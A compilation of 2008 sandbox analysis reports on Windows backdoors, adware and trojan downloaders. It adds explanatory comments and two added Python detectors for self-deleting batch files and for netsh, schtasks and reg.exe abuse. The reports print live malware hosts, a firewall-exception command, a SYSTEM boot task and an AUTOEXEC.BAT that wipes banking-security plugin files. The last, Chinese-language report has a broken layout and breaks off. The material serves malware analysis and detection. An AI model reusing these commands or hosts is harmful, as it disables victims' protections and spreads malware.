// ServiceCurrent is the SCM's own bookkeeping when a service starts, and the Cache\Paths values are WinINet initialising its cache for a service profile; both are side effects of the service starting and making the HTTP request below, not configuration the sample sets deliberately.
Downloads file:
http://zhmlove.dx2.yilehost.cn/ip.txt
Result:
Type: Backdoor-Hupigon
Sample file name: Backdoor2008.12.24@004
Analysis report for V1.6.exe
General information:
Analysis date: 2008-12-05
Executable: yes
File type: EXE
Uploader: integear
Analyst: integear
Process tree:
V1.6.exe // parent
Behaviour of V1.6.exe:
Creates files:
V1.6.exe // parent
Creates processes:
V1.6.exe // parent
Modifies the hosts file:
www.jingziwww.cn // an entry for this host is added
Downloads files:
http://www.jingziwww.cn/kabakeytxt/key.txt
http://www.jingziwww.cn/kabakeytxt/keyurl.txt
http://www.jingziwww.cn/kabakeytxt/date.txt
http://www.jingziwww.cn/kabakeytxt/update1.7.txt
Result:
Type: Backdoor-Hupigon
Sample file name: Backdoor2008.12.24@006
Sample name: A0008739.exe
Type: Trojan-Adware-BHO
Sample file name: Trojan2008.12.24@001
Uploader: mizuhara
Analyst: asusp4b533
Analysis date: 20081206
Analysis tool: ThreatExpert
Executable: yes
Creates files:
* %DesktopDir%\Cheap Pharmacy Online.url
* %DesktopDir%\Search Online.url
* %DesktopDir%\SMS TRAP.url
* %DesktopDir%\VIP Casino.url
* %System%\axvitu.dll
* %System%\c.ico
* %System%\m.ico
* %System%\p.ico
* %System%\s.ico
Process and memory behaviour:
Remote DLL injection: %System%\axvitu.dll -> IEXPLORE.EXE
// ThreatExpert reports this as injection, but the registry entries below show the mechanism: axvitu.dll is registered as a Browser Helper Object, so Internet Explorer loads it itself at start-up; no injection code is needed
Registry keys created:
* HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E9B5BA28-C732-49DC-94CE-9079F7F75F4E}
* HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E9B5BA28-C732-49DC-94CE-9079F7F75F4E}\InprocServer32
* HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E9B5BA28-C732-49DC-94CE-9079F7F75F4E}\ProgID
* HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E9B5BA28-C732-49DC-94CE-9079F7F75F4E}\Programmable
* HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E9B5BA28-C732-49DC-94CE-9079F7F75F4E}\TypeLib
* HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E9B5BA28-C732-49DC-94CE-9079F7F75F4E}\VersionIndependentProgID
* HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{8DFE3882-5474-4010-BF17-544D1D390117}
* HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{8DFE3882-5474-4010-BF17-544D1D390117}\ProxyStubClsid
* HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{8DFE3882-5474-4010-BF17-544D1D390117}\ProxyStubClsid32
* HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{8DFE3882-5474-4010-BF17-544D1D390117}\TypeLib
* HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{FEF72F04-58F1-433F-8B51-4C6E85B4605B}
* HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{FEF72F04-58F1-433F-8B51-4C6E85B4605B}\ProxyStubClsid
* HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{FEF72F04-58F1-433F-8B51-4C6E85B4605B}\ProxyStubClsid32
* HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{FEF72F04-58F1-433F-8B51-4C6E85B4605B}\TypeLib
* HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{A8954909-1F0F-41A5-A7FA-3B376D69E226}
* HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{A8954909-1F0F-41A5-A7FA-3B376D69E226}\1.0
* HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{A8954909-1F0F-41A5-A7FA-3B376D69E226}\1.0\0
* HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{A8954909-1F0F-41A5-A7FA-3B376D69E226}\1.0\0\win32
* HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{A8954909-1F0F-41A5-A7FA-3B376D69E226}\1.0\FLAGS
* HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{A8954909-1F0F-41A5-A7FA-3B376D69E226}\1.0\HELPDIR
* HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AlsaLi
* HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AlsaLi\CLSID
* HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AlsaLi\CurVer
* HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AlsaLi.1
* HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AlsaLi.1\CLSID
* HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects
* HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{E9B5BA28-C732-49DC-94CE-9079F7F75F4E}
* HKEY_CURRENT_USER\Software\Microsoft\Bind
Registry values set:
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E9B5BA28-C732-49DC-94CE-9079F7F75F4E}\VersionIndependentProgID]
+ (Default) = "AlsaLi"
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E9B5BA28-C732-49DC-94CE-9079F7F75F4E}\TypeLib]
+ (Default) = "{A8954909-1F0F-41A5-A7FA-3B376D69E226}"
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E9B5BA28-C732-49DC-94CE-9079F7F75F4E}\ProgID]
+ (Default) = "AlsaLi.1"
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E9B5BA28-C732-49DC-94CE-9079F7F75F4E}\InprocServer32]
+ (Default) = "%System%\axvitu.dll"
+ ThreadingModel = "Apartment"
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E9B5BA28-C732-49DC-94CE-9079F7F75F4E}]
+ (Default) = "Almsms"
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{8DFE3882-5474-4010-BF17-544D1D390117}\TypeLib]
+ (Default) = "{A8954909-1F0F-41A5-A7FA-3B376D69E226}"
+ Version = "1.0"
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{8DFE3882-5474-4010-BF17-544D1D390117}\ProxyStubClsid32]
+ (Default) = "{00020420-0000-0000-C000-000000000046}"
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{8DFE3882-5474-4010-BF17-544D1D390117}\ProxyStubClsid]
+ (Default) = "{00020420-0000-0000-C000-000000000046}"
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{8DFE3882-5474-4010-BF17-544D1D390117}]
+ (Default) = "_IbduczwEvents"
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{FEF72F04-58F1-433F-8B51-4C6E85B4605B}\TypeLib]
+ (Default) = "{A8954909-1F0F-41A5-A7FA-3B376D69E226}"
+ Version = "1.0"
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{FEF72F04-58F1-433F-8B51-4C6E85B4605B}\ProxyStubClsid32]
+ (Default) = "{00020424-0000-0000-C000-000000000046}"
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{FEF72F04-58F1-433F-8B51-4C6E85B4605B}\ProxyStubClsid]
+ (Default) = "{00020424-0000-0000-C000-000000000046}"
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{FEF72F04-58F1-433F-8B51-4C6E85B4605B}]
+ (Default) = "Ibduczw"
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{A8954909-1F0F-41A5-A7FA-3B376D69E226}\1.0\0\win32]
+ (Default) = "%System%\axvitu.dll"
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{A8954909-1F0F-41A5-A7FA-3B376D69E226}\1.0\HELPDIR]
+ (Default) = "%System%\"
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{A8954909-1F0F-41A5-A7FA-3B376D69E226}\1.0\FLAGS]
+ (Default) = "0"
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{A8954909-1F0F-41A5-A7FA-3B376D69E226}\1.0]
+ (Default) = "ssxzzw Library"
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AlsaLi\CurVer]
+ (Default) = "AlsaLi.1"
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AlsaLi\CLSID]
+ (Default) = "{E9B5BA28-C732-49DC-94CE-9079F7F75F4E}"
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AlsaLi]
+ (Default) = "Almsms"
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AlsaLi.1\CLSID]
+ (Default) = "{E9B5BA28-C732-49DC-94CE-9079F7F75F4E}"
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AlsaLi.1]
+ (Default) = "Almsms"
[HKEY_CURRENT_USER\Software\Microsoft\Bind]
+ comment2 = "5xxx3913705"
// Everything above is a standard COM registration (CLSID, ProgID, interfaces with the stock proxy/stub CLSIDs, type library) plus the single entry under Explorer\Browser Helper Objects that makes Internet Explorer load the DLL. Removing that BHO entry and the CLSID key is what stops the DLL from loading; the .url shortcuts on the desktop are only the visible part.
Notes:
Outbound connection: lookfornewsoftware.com
Downloads pages: http://lookfornewsoftware.com/cfg1.php
http://lookfornewsoftware.com/cfg2.php
Analysis report for cao.exe
General information:
Analysis date: 2008-12-05
Executable: yes
File type: EXE (packed with UPack)
Uploader: kitman231
Analyst: 000110
Process tree:
cao.exe
├ rundll32.exe
│ └ cmd.exe (1st run)
│
└ zsmscc071001.exe
  │
  └ iexplore.exe
└ cmd.exe (2nd run)
Behaviour of cao.exe:
Creates files:
C:\WINDOWS\system32\zsmscc071001.exe
C:\WINDOWS\zsmscc16.ini
C:\WINDOWS\system32\zsmscc071001.dll
c:\nmDelm.bat
Writes files:
C:\WINDOWS\system32\zsmscc071001.exe
C:\WINDOWS\zsmscc16.ini
C:\WINDOWS\system32\zsmscc071001.dll
C:\nmDelm.bat
Creates registry keys:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\run
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer
Sets registry values (path / name / value):
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\run\ zsmscc = rundll32.exe C:\WINDOWS\system32\zsmscc071001.dll mymain
// the program named here runs automatically at system start; the Policies\Explorer\Run key is an autostart location that many tools overlook in favour of the ordinary Run key
Creates processes (path / program / arguments):
c:\windows\system32\ rundll32.exe C:\WINDOWS\system32\zsmscc071001.dll mymain
c:\windows\system32\ cmd.exe /c c:\nmDelm.bat // 2nd run of cmd.exe
Behaviour of rundll32.exe:
Creates files:
c:\downf.bat
Writes files:
C:\downf.bat
Creates processes (path / program / arguments):
c:\windows\system32\ cmd.exe /c c:\downf.bat // 1st run of cmd.exe
Behaviour of cmd.exe (1st run):
Creates processes (path / program / arguments):
c:\windows\system32\ zsmscc071001.exe i
Deletes files:
C:\downf.bat
Behaviour of cmd.exe (2nd run):
Deletes files:
%Patch%\cao.exe // %Patch% is the report's placeholder for the directory cao.exe was run from
C:\nmDelm.bat
Behaviour of zsmscc071001.exe:
Creates files:
C:\WINDOWS\system32\zsmscc32.dll
Writes files:
C:\WINDOWS\zsmscc16.ini
C:\WINDOWS\system32\zsmscc32.dll
Creates processes (path / program):
c:\program files\internet explorer\ iexplore.exe
Accesses the memory of another process:
c:\program files\internet explorer\iexplore.exe
Creates a thread in another process:
c:\program files\internet explorer\iexplore.exe
Behaviour of iexplore.exe:
No suspicious behaviour observed
// the sample launches its own copy of Internet Explorer and injects into it, so any network traffic from this point on originates from a trusted browser process; the injected code was not captured by the trace
Additional information:
Other behaviour:
1. Network connection activity
Contents of nmDelm.bat:
:try
del "C:\Documents and Settings\VMware\桌面\tavo\cao_vcc_kitman231\cao.exe"
if exist "C:\Documents and Settings\VMware\桌面\tavo\cao_vcc_kitman231\cao.exe" goto try
del %0
Contents of downf.bat:
"C:\WINDOWS\system32\zsmscc071001.exe" i
del %0
Result:
Type: Trojan
Sample file name: Trojan2008.12.24@002
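Samples 001 (GOLBUB.bat) and this one (nmDelm.bat, downf.bat) drop the same kind of cleanup script: a label, a del of the original dropper, an "if exist ... goto" back to the label so the loop spins until the parent process has exited and the file can be removed, then "del %0" to erase the script itself. Because the dropper is gone by the time anyone looks, the batch file, if it is recovered from a trace or from unallocated space, is often the only record of where the sample was first run. The scanner below is an added example, not a tool from the original report; it recognises that retry-delete loop, self-deletion and any executables the script launches. The three sample inputs are the batch files as listed in the reports, with the report's [User Name] placeholder left in place.

```python
import re

# Added example: static scanner for dropper-cleanup batch files.
# Handles the "label / del / if exist ... goto label / del %0" pattern used above.

LABEL_RE = re.compile(r"^:(\w+)\s*$")
DEL_RE = re.compile(r'^del(?![a-z])\s*(?:/[a-z]+\s*)*"?(?P<target>[^"]+?)"?\s*$', re.IGNORECASE)
IF_EXIST_GOTO_RE = re.compile(
    r'^if\s+exist\s+"?(?P<target>[^"]+?)"?\s+goto\s+(?P<label>\w+)\s*$', re.IGNORECASE)
EXEC_RE = re.compile(r'^"?(?P<exe>[^"\s]+\.exe)"?(?P<args>.*)$', re.IGNORECASE)


def _del_target(line):
    m = DEL_RE.match(line)
    return m.group("target") if m else None


def analyze_batch(text):
    """Summarise what a cleanup batch file does; returns a dict of findings."""
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    labels = {}
    for i, ln in enumerate(lines):
        m = LABEL_RE.match(ln)
        if m:
            labels[m.group(1).lower()] = i
    result = {"self_delete": False, "deletes": [], "retry_delete_targets": [], "executes": []}
    for i, line in enumerate(lines):
        target = _del_target(line)
        if target is not None:
            if target == "%0":
                result["self_delete"] = True  # the script erases itself; only the payload survives
            else:
                result["deletes"].append(target)
            continue
        m = IF_EXIST_GOTO_RE.match(line)
        if m:
            label = m.group("label").lower()
            # A backward goto whose loop body deletes the same path: the script is
            # waiting for the still-running parent to exit so the file can be removed.
            if label in labels and labels[label] < i:
                body = lines[labels[label] + 1:i]
                if any(_del_target(b) == m.group("target") for b in body):
                    result["retry_delete_targets"].append(m.group("target"))
            continue
        m = EXEC_RE.match(line)
        if m:
            result["executes"].append((m.group("exe"), m.group("args").strip()))
    return result


# Inputs copied from the reports (sample 001 and this sample).
GOLBUB_BAT = r"""
:try
del "C:\Documents and Settings\[User Name]\桌面\tavo\1.EXE"
if exist "C:\Documents and Settings\[User Name]\桌面\tavo\1.EXE" goto try
del %0
exit
"""
NMDELM_BAT = r"""
:try
del "C:\Documents and Settings\VMware\桌面\tavo\cao_vcc_kitman231\cao.exe"
if exist "C:\Documents and Settings\VMware\桌面\tavo\cao_vcc_kitman231\cao.exe" goto try
del %0
"""
DOWNF_BAT = r"""
"C:\WINDOWS\system32\zsmscc071001.exe" i
del %0
"""

if __name__ == "__main__":
    for name, text in (("GOLBUB.bat", GOLBUB_BAT), ("nmDelm.bat", NMDELM_BAT), ("downf.bat", DOWNF_BAT)):
        print(name, analyze_batch(text))
```

The retry-delete target is the useful output: it is the full path of the dropper as it sat on the victim's disk, which the cleanup script hard-codes even though the dropper itself has been removed.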
Analysis report for first.exe
General information:
Analysis date: 2008-12-10
Executable: yes
File type: EXE
Uploader: kitman231
Analyst: integear
Process tree:
first.exe
└ delme.bat
└ hgcheck.exe
Behaviour of first.exe:
Creates files:
C:\Documents and Settings\[User Name]\delme.bat // dropped file
C:\Windows\System32\hgcheck.exe // dropped file
first.exe // parent
Creates processes:
first.exe // parent
Downloads:
http://www.Msnupdateslive.com/download/hgcheck.jpg // a packed executable served with a .jpg extension; no notable behaviour of its own (it is analyzed separately as Trojan2008.12.24@004)
Result:
Type: Trojan-Downloader
Sample file name: Trojan2008.12.24@003
Analysis report for hgcheck.exe
General information:
Analysis date: 2008-12-10
Executable: yes
File type: EXE
Uploader: kitman231
Analyst: integear
Process tree:
hgcheck.exe
└ svchost.exe
Behaviour of hgcheck.exe:
Creates files:
hgcheck.exe // parent
svchost.exe // dropped file
Creates processes:
hgcheck.exe // parent
Notes:
Shows inconspicuous download activity.
Result:
Type: Trojan-Downloader
Sample file name: Trojan2008.12.24@004
Analysis report for kl.exe
General information:
Analysis date: 2008-12-03
Executable: yes
File type: EXE (packed with ASProtect)
Uploader: kitman231
Analyst: 000110
Process tree:
kl.exe
├ netsh.exe
├ schtasks.exe
├ reg.exe (1st run)
├ reg.exe (2nd run)
└ reg.exe (3rd run)
Behaviour of kl.exe:
Deletes files:
C:\AUTOEXEC.BAT // dangerous: the sample replaces this system file with its own script (contents below) and schedules it to run at boot
Creates files:
C:\windows\system\win.exe
c:\remove\remove.CMD
c:\autoexec.bat
C:\Windows\System32\Gbpsv.exe
C:\remove\psexec.exe
C:\remove\pskill.exe
C:\remove\SetACL.exe
C:\remove\movefile.exe
C:\remove\mata.CMD
C:\remove\deleta.CMD
C:\remove\removeGB.CMD
C:\remove\setreg.CMD
C:\remove\clngbuster.reg
C:\wscntfy.dat
C:\WINDOWS\system32\REGISTRANDO_007.txt
Writes files:
C:\WINDOWS\system\win.exe
C:\remove\remove.CMD
C:\autoexec.bat
C:\WINDOWS\system32\Gbpsv.exe
C:\remove\psexec.exe
C:\remove\pskill.exe
C:\remove\SetACL.exe
C:\remove\movefile.exe
C:\remove\mata.CMD
C:\remove\deleta.CMD
C:\remove\removeGB.CMD
C:\remove\setreg.CMD
C:\remove\clngbuster.reg
// the C:\remove folder is a toolkit of legitimate Sysinternals and SetACL utilities plus the scripts that drive them; the dropped Gbpsv.exe reuses the name of the GbpSv.exe that the AUTOEXEC.BAT below deletes from the GbPlugin folder
Sets registry values (path / name / value):
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ Windows32 = C:\windows\system\win.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ Gbpsv.exe = C:\Windows\System32\Gbpsv.exe
// both programs run at every system start
Creates processes (path / program / arguments):
c:\windows\system32\ netsh.exe firewall add allowedprogram C:\windows\system\win.exe RPCCC
// adds an allow rule through netsh.exe, punching a hole in the built-in Windows Firewall for win.exe
c:\windows\system32\ schtasks.exe /create /tn startt /tr c:\autoexec.bat /sc onstart /ru system
// creates a scheduled task through schtasks.exe: c:\autoexec.bat runs as SYSTEM at every system start
c:\windows\system32\ reg.exe add "HKCU\Software\Sysinternals\PsExec" /v EulaAccepted /t REG_DWORD /d "0x00000001" /f
c:\windows\system32\ reg.exe add "HKCU\Software\Sysinternals\PsKill" /v EulaAccepted /t REG_DWORD /d "0x00000001" /f
c:\windows\system32\ reg.exe add "HKCU\Software\Sysinternals\Movefile" /v EulaAccepted /t REG_DWORD /d "0x00000001" /f
// pre-accepting the Sysinternals EULA keeps PsExec, PsKill and MoveFile from showing their licence dialog when the dropped scripts run them
Behaviour of schtasks.exe:
Creates files:
C:\WINDOWS\Tasks\startt.job
Writes files:
C:\WINDOWS\Tasks\startt.job
Behaviour of netsh.exe:
Sets registry values (path / name / value):
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\ C:\WINDOWS\system\win.exe = C:\WINDOWS\system\win.exe:*:Enabled:RPCCC
Behaviour of reg.exe (1st run):
Sets registry values (path / name / value):
HKCU\Software\Sysinternals\PsExec EulaAccepted = 0x00000001
Behaviour of reg.exe (2nd run):
Sets registry values (path / name / value):
HKCU\Software\Sysinternals\PsKill EulaAccepted = 0x00000001
Behaviour of reg.exe (3rd run):
Sets registry values (path / name / value):
HKCU\Software\Sysinternals\Movefile EulaAccepted = 0x00000001
Additional information:
Other behaviour: none
Contents of AUTOEXEC.BAT:
@echo off
cd\
del/s/q c:\windows\downlo~1\gb*.*
attrib -h -r -s "C:\Arquivos de programas\GbPlugin\*.exe" /s/q
rd /s/q "C:\Arquivos de programas\GbPlugin\*.exe"
del/s/q c:\windows\downlo~1\*.g??
del/s/q c:\windows\downlo~1\g*.*
del/s/q c:\arquiv~1\GbPlugin\g*.*
del/s/q c:\arquiv~1\GbPlugin\GbpSv.exe
del/s/q c:\arquiv~1\GbPlugin\gbiehcef.DLL
del/s/q c:\arquiv~1\GbPlugin\gbiehabn.dll
del/s/q c:\arquiv~1\GbPlugin\gbieh.dll
del/s/q c:\arquiv~1\GbPlugin\Cef.gpc
del/s/q c:\arquiv~1\GbPlugin\Bb.gpc
del/s/q c:\arquiv~1\GbPlugin\*.gmd
del/s/q c:\arquiv~1\GbPlugin\*.exe
del/s/q c:\arquiv~1\GbPlugin\*.dll
del/s/q c:\arquiv~1\Scpad\*.dll
del/s/q c:\arquiv~1\Scpad\*.bin
del/s/q c:\arquiv~1\GbPlugin\*.gmd
del/s/q c:\arquiv~1\GbPlugin\*.gpc
del/s/q c:\arquiv~1\GbPlugin\*.gmd
@echo.
^z
// the script wipes the GbPlugin and Scpad folders and the GbPlugin files under Downloaded Program Files. "Arquivos de programas" is the Portuguese-locale Program Files folder, so the sample is built for pt-BR systems and will find nothing to delete elsewhere. Running it as SYSTEM at boot, before the user's session exists, is what lets it remove files that are otherwise locked or protected.
Contents of startt.job:
Runs c:\autoexec.bat at system start
Result:
Type: Trojan-Agent
Sample file name: Trojan2008.12.24@005
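Three of kl.exe's child processes are ordinary Windows tools used for three distinct purposes: netsh to open the firewall for the dropped win.exe, schtasks to run the replacement AUTOEXEC.BAT as SYSTEM at boot, and reg.exe to pre-accept the Sysinternals EULA so PsExec and PsKill run silently. Each of these is a reliable detection on its own from process-creation records (the command line is all that is needed). The block below is an added example, not part of the original report or of any vendor product: it tokenises a command line the way the Windows tools would and flags the three patterns. The input records are taken from the "creates processes" table above; the netsh advfirewall form is an extension for Vista and later that the report does not show.

```python
import shlex

# Added example: flag the three living-off-the-land patterns from process-creation records.


def _tokens(cmdline):
    # posix=False keeps backslashes literal; outer quotes are stripped per token
    return [t.strip('"') for t in shlex.split(cmdline, posix=False)]


def _opt(tokens, flag):
    """Value following a /flag switch, matched case-insensitively, or None."""
    low = [t.lower() for t in tokens]
    if flag.lower() not in low:
        return None
    i = low.index(flag.lower())
    return tokens[i + 1] if i + 1 < len(tokens) else None


def inspect_process(image, cmdline):
    """Return a list of (rule, detail) findings for one process-creation record."""
    name = image.lower().replace("/", "\\").rsplit("\\", 1)[-1]
    toks = _tokens(cmdline)
    low = [t.lower() for t in toks]
    findings = []
    if name == "netsh.exe":
        if low[:3] == ["firewall", "add", "allowedprogram"] and len(toks) > 3:
            findings.append(("firewall_exception", toks[3]))  # XP-era syntax, as in the report
        elif low[:4] == ["advfirewall", "firewall", "add", "rule"]:  # Vista and later
            prog = next((t.split("=", 1)[1].strip('"') for t in toks
                         if t.lower().startswith("program=")), None)
            findings.append(("firewall_exception", prog or cmdline))
    elif name == "schtasks.exe" and "/create" in low:
        sc = (_opt(toks, "/sc") or "").lower()
        ru = (_opt(toks, "/ru") or "").lower()
        if sc in ("onstart", "onlogon") and ru in ("system", "nt authority\\system"):
            findings.append(("system_task_at_boot",
                             "%s -> %s" % (_opt(toks, "/tn"), _opt(toks, "/tr"))))
    elif name == "reg.exe" and low[:1] == ["add"] and len(toks) > 1:
        key = toks[1]
        if "\\sysinternals\\" in key.lower() and (_opt(toks, "/v") or "").lower() == "eulaaccepted":
            findings.append(("sysinternals_eula_preaccept", key.rsplit("\\", 1)[-1]))
    return findings


def scan(records):
    """Run inspect_process over (image, cmdline) pairs and collect every finding."""
    return [f for image, cmdline in records for f in inspect_process(image, cmdline)]


# Constructed from the "creates processes" table of the kl.exe report.
KL_EXE_CHILDREN = [
    (r"c:\windows\system32\netsh.exe",
     r"firewall add allowedprogram C:\windows\system\win.exe RPCCC"),
    (r"c:\windows\system32\schtasks.exe",
     r"/create /tn startt /tr c:\autoexec.bat /sc onstart /ru system"),
    (r"c:\windows\system32\reg.exe",
     r'add "HKCU\Software\Sysinternals\PsExec" /v EulaAccepted /t REG_DWORD /d "0x00000001" /f'),
    (r"c:\windows\system32\reg.exe",
     r'add "HKCU\Software\Sysinternals\PsKill" /v EulaAccepted /t REG_DWORD /d "0x00000001" /f'),
    (r"c:\windows\system32\reg.exe",
     r'add "HKCU\Software\Sysinternals\Movefile" /v EulaAccepted /t REG_DWORD /d "0x00000001" /f'),
]

if __name__ == "__main__":
    for rule, detail in scan(KL_EXE_CHILDREN):
        print("%-28s %s" % (rule, detail))
```

The EULA rule is the one that rarely appears in legitimate administration: an interactive operator clicks the dialog once, whereas a script that pre-seeds EulaAccepted for three tools in a row is staging them for unattended use.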
securefileshredderinstallerdualen.exe 的分析報告
一般資訊 :
分析日期 : 2008-12-03
可執行 : 是
檔案類型 : EXE (安裝程式)
上傳者 : kitman231
分析者 : 000110
樣本骨幹圖 :
securefileshredderinstallerdualen.exe
└ sfssetupdual.exe (第 1 次執行)
└ sfssetupdual.tmp (位於 is-3i6ur.tmp\ 資料夾下)
└ sfssetupdual.exe (第 2 次執行)
└ sfssetupdual.tmp (位於 is-0r26f.tmp\ 資料夾下)
├ taskkill.exe
├ regsvr32.exe
├ fileshredder.exe
└ filemonitor.exe
securefileshredderinstallerdualen.exe 的行為分析 :
設定登錄資料 :
路徑
名稱
數值
HKEY_LOCAL_MACHINE\SOFTWARE\Micro SecureFileShred %Patch%\SecureFileShredderInst
soft\Windows\CurrentVersion\Run\
derDownloader allerDualEn_wc_kitman231.exe*
*
: %Patch% 對應檔案 SecureFileShredderInstallerDualEn_wc_kitman231.exe 的相對位置
建立檔案 :
C:\Documents and Settings\[User Name]\Local Settings\Temporary Internet
Files\Content.IE5\5YNF88C6\SecureFileShredderSetupDualEn[1].exe //從互聯網下
載
C:\Documents and Settings\[User Name]\Local
Settings\Temp\FileShredderSetup\SFSSetupDual.exe
寫入檔案 :
C:\Documents and Settings\[User Name]\Local
Settings\Temp\FileShredderSetup\SFSSetupDual.exe
建立資料夾 :
C:\Documents and Settings\[User Name]\Local Settings\Temp\FileShredderSetup
刪除登錄資料 :
路徑
名稱
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVer SecureFileShredderDownl
sion\Run\
oader
建立新的處理程序 :
路徑
c:\documents and settings\[User Name]\local
settings\temp\fileshreddersetup\
程式名稱
sfssetupdual.exe
啟動參數
/tid=6200
sfssetupdual.exe 的行為分析 (第 1 次執行) :
建立資料夾 :
C:\Documents and Settings\[User Name]\Local Settings\Temp\is-3I6UR.tmp
建立檔案 :
C:\Documents and Settings\[User Name]\Local
Settings\Temp\is-3I6UR.tmp\SFSSetupDual.tmp
寫入檔案 :
C:\Documents and Settings\[User Name]\Local
Settings\Temp\is-3I6UR.tmp\SFSSetupDual.tmp
建立新的處理程序 :
路徑
c:\documents and
settings\[User Name]\local
settings\temp\is-3i6ur.tmp\
程式名稱
sfssetupdual.tmp
啟動參數
/SL5="$602E8,1173147,53248,C:\DOCUME
~1\[User
Name]\LOCALS~1\Temp\FileShredderSetup
\SFSSetupDual.exe" /tid=6200
sfssetupdual.tmp 的行為分析 :
建立資料夾 :
C:\Documents and Settings\[User Name]\Local Settings\Temp\is-PUPCL.tmp
建立檔案 :
C:\Documents and Settings\[User Name]\Local
Settings\Temp\is-PUPCL.tmp\_isetup\_RegDLL.tmp
C:\Documents and Settings\[User Name]\Local
Settings\Temp\is-PUPCL.tmp\_isetup\_shfoldr.dll
寫入檔案 :
C:\Documents and Settings\[User Name]\Local
Settings\Temp\is-PUPCL.tmp\_isetup\_RegDLL.tmp
C:\Documents and Settings\[User Name]\Local
Settings\Temp\is-PUPCL.tmp\_isetup\_shfoldr.dll
建立新的處理程序 :
路徑
c:\documents and
settings\[User Name]\local
settings\temp\fileshredders
etup\
程式名稱
啟動參數
sfssetupdual.e /verysilent /norestart
xe
/sl5="$602e8,1173147,53248,c:\docume~1\[Use
r
Name]\locals~1\temp\fileshreddersetup\sfssetu
pdual.exe" /tid=6200
刪除檔案 :
C:\Documents and Settings\[User Name]\Local
Settings\Temp\is-PUPCL.tmp\_isetup\_RegDLL.tmp
C:\Documents and Settings\[User Name]\Local
Settings\Temp\is-PUPCL.tmp\_isetup\_shfoldr.dll
刪除資料夾 :
C:\Documents and Settings\[User Name]\Local Settings\Temp\is-PUPCL.tmp
sfssetupdual.exe 的行為分析 (第 2 次執行) :
刪除檔案 :
C:\Documents and Settings\[User Name]\Local
Settings\Temp\is-3I6UR.tmp\SFSSetupDual.tmp
C:\Documents and Settings\[User Name]\Local
Settings\Temp\is-0R26F.tmp\SFSSetupDual.tmp
建立資料夾 :
C:\Documents and Settings\[User Name]\Local Settings\Temp\is-0R26F.tmp
建立檔案 :
C:\Documents and Settings\[User Name]\Local
Settings\Temp\is-0R26F.tmp\SFSSetupDual.tmp
刪除資料夾 :
C:\Documents and Settings\[User Name]\Local Settings\Temp\is-3I6UR.tmp
C:\Documents and Settings\[User Name]\Local Settings\Temp\is-0R26F.tmp
建立新的處理程序 :
路徑
程式名稱
c:\documents and sfssetupdual.tmp
settings\[User
Name]\local
settings\temp\is-0
r26f.tmp\
啟動參數
/SL5="$702E8,1173147,53248,C:\DOCUME~1\[User
Name]\LOCALS~1\Temp\FileShredderSetup\SFSSetupD
ual.exe" /verysilent /norestart
/sl5="$602e8,1173147,53248,c:\docume~1\[User
